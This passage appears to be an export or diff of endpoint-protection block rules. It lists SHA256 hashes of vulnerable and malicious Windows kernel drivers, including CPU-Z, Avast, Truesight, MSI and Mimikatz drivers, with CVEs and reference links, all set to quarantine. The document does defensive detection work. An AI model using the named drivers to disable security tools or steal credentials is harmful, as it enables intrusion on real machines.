"hl_testing_start_time": "2026-03-23T11:45:29.611667Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "653601cf8c3c2c4b778f9025d4e964c887966cc3216bb35a73a3ae75477b4476", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a133284a-a291-5215-8df2-0a854e664a24", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969257Z", + "creation_date": "2026-03-23T11:45:29.969259Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969264Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aaa3459bcac25423f78ed72dbae4d7ef19e7c5c65770cbe5210b14e33cd1816c", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a138f940-5851-5ac4-a789-44279cd09021", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143788Z", + "creation_date": "2026-03-23T11:45:31.143790Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143798Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d3dff040ce865489dbbec07b54d52c282d4b1e7ec468d54e1c90d086a3522255", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a13b20e2-1009-53bb-8472-3f2d356e9867", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143060Z", + "creation_date": "2026-03-23T11:45:31.143061Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143067Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "dd978d1bf595a536361017627a37929a7cea97b7ff0481526efa59f3cef6b479", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a141398c-4faa-50ca-8d4a-497300e18a03", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813863Z", + "creation_date": "2026-03-23T11:45:31.813865Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813885Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1bb3e25e7a482bf47179ac18e747037f9515d058824f0c07fc323027d4d0bf13", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a145fc68-aead-5cec-8a4a-f170b5ec31e4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611308Z", + "creation_date": "2026-03-23T11:45:29.611309Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611315Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b46fb3ed5a7a84ef594ab0b76f384aa2dca0614574478fb98308806612609465", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a14626ad-8043-5ff0-bd15-099db05a290d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159193Z", + "creation_date": "2026-03-23T11:45:31.159195Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159201Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "426f0507ecdd90b1fd400d79c2fb0e2b62ae329647ab9511139a8b450da0c327", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a152c187-c038-54ab-bc80-cf0f8ffcb6cc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810182Z", + "creation_date": "2026-03-23T11:45:31.810184Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810190Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "18e64cc0071989c4052112a2566fe2a70daebec57de48c335357729afca7da72", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a15529a5-6d6a-53d7-aca9-57945c4cb1d6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.482370Z", + "creation_date": "2026-03-23T11:45:31.482374Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.482384Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "913fe318fb59a71cf9e5071009c9bc8db146b31da716980757e4744d48dc3f90", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a1630155-da2c-51cf-9fe0-02be02687a55", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828173Z", + "creation_date": "2026-03-23T11:45:30.828175Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828180Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0e6d3b0e2bc567dc978a349e58c3dca212a75b09da7d944e5168b9de84ca883e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a169b8e4-42ac-563b-9e45-d94ee3cd6b70", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969612Z", + "creation_date": "2026-03-23T11:45:29.969614Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969619Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "03a54ad77fc453c9889e170a811d232a305d46fb7f59582d3f1cb234598507a1", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a16cdef7-d758-5008-8506-3342d94bae27", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827840Z", + "creation_date": "2026-03-23T11:45:31.827842Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": 
true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827848Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4e290d8863ca733d2dce2716dd2527cc1fc2698a0c5e8defdb3ba9a320c3aaaa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a18ce454-f8c7-58ce-b538-44be0f92a0a8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614506Z", + "creation_date": "2026-03-23T11:45:29.614508Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614513Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "39cfde7d401efce4f550e0a9461f5fc4d71fa07235e1336e4f0b4882bd76550e", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a18f9c26-3ab9-5ac1-a49b-c5cc8c362d5d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617413Z", + "creation_date": "2026-03-23T11:45:29.617415Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617421Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "83ffcfaf429c8368194d7b73f7729d97d6a3b80fb203d57055f3e4eec8228914", + "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a18fc74d-2660-5ff1-b3e7-d6363648cc6f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154350Z", + "creation_date": "2026-03-23T11:45:31.154352Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154357Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": 
null, + "references": [], + "type": "hash", + "value": "cbac1a38b4e028dd833b9a1e1d7a829f3e4520846fd312ac8c3ef310c235d27f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a19ffef0-a445-5c7a-9db6-b1b4c7cdb375", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814886Z", + "creation_date": "2026-03-23T11:45:31.814890Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814899Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "48f81bd54cc3e4d049f9a88d3952c6e7fba1097785001be9bc4e4aa581eb2479", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a1af1167-2942-56fd-97d4-f6c795e7615c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979794Z", + "creation_date": "2026-03-23T11:45:29.979796Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979802Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "79278979d9300670d1084493bbc03ae374efc5ab02850941e85753885fa88e47", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a1b248aa-0d41-5619-a86a-7ab9478ab7b3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822544Z", + "creation_date": "2026-03-23T11:45:31.822546Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822551Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e66650e0dcdee274e2b23263027ae9a0d6efaffb81fd7c51ab0f542175e49ed4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller 
(v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a1c4d6a8-3a25-52e9-b149-8352002efd1a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825476Z", + "creation_date": "2026-03-23T11:45:31.825478Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825483Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6111959c7d497cdf76b482c20ba18c11ff075af083cd6143527e5ed5cc902c07", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a1d62b8b-e4ec-5085-8e0a-35fcfb725ffe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:29.970964Z", + "creation_date": "2026-03-23T11:45:29.970967Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970976Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d172d95afc72a8a4a6362175bd68b5f4405f166fff94464d845213af586fe8bd", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a1d76c4d-6f19-59c4-9dcf-ad77d2b00873", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980958Z", + "creation_date": "2026-03-23T11:45:29.980960Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980965Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bceaf970b60b4457eca3c181f649a1c67f4602778171e53d9bdc9b97a09603ca", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a1e19de0-8952-508b-b869-67b8c9af3f82", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980785Z", + "creation_date": "2026-03-23T11:45:29.980787Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980792Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9544fbc011638cbc168f6ea4740cc6ed6fd331769e191fd64bdf9113eb64fde1", + "comment": "Vulnerable Kernel Driver (aka PanMonFltX64.sys) [https://www.loldrivers.io/drivers/40bfb01b-d251-4c2c-952e-052a89a76f5b/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a1e6553d-bd83-50d3-8003-124ab5210717", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465957Z", + "creation_date": "2026-03-23T11:45:30.465960Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465969Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": 
null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f3ec3f22639d45b3c865bb1ed7622db32e04e1dbc456298be02bf1f3875c3aac", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a1f74978-6ec7-5a57-b81f-3047f4d09245", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615895Z", + "creation_date": "2026-03-23T11:45:29.615897Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615903Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1f5e9fc579028d5cae916743528891aa39a4eecb3f573ea522eeb8da97f95953", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a21b981f-c3da-5b4a-a1d0-c11fc9a9c3ee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": 
false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974161Z", + "creation_date": "2026-03-23T11:45:29.974163Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974168Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fda93c6e41212e86af07f57ca95db841161f00b08dae6304a51b467056e56280", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a21c0261-3771-5bdf-9fd0-fbd528436d99", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 